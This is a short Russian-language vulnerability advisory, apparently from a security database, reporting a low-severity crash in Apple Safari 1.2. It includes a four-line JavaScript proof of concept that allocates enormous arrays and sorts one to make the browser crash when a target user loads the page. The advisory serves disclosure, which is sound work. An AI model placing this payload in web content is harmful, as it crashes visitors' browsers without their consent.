Аварийное завершение работы большим Javascript масивом в Apple Safari браузере

Дата публикации:
21.03.2004
Всего просмотров:
1220
Опасность:
Низкая
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: Apple Safari 1.2

Описание: Уязвимость обнаружена в Apple Safari браузере. Удаленный пользователь может создать HMTL, который, когда будет загружен целевым пользователем, аварийно завершит работу браузера.

~ var a = new Array(99999999999999999999999);
~ a[0+5]="AAAAA";
var bam = new Array(0x23000000);
bam.sort(new Function("return 1"));

URL производителя:http://www.apple.com/

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: Safari javascript array overflow

или введите имя

CAPTCHA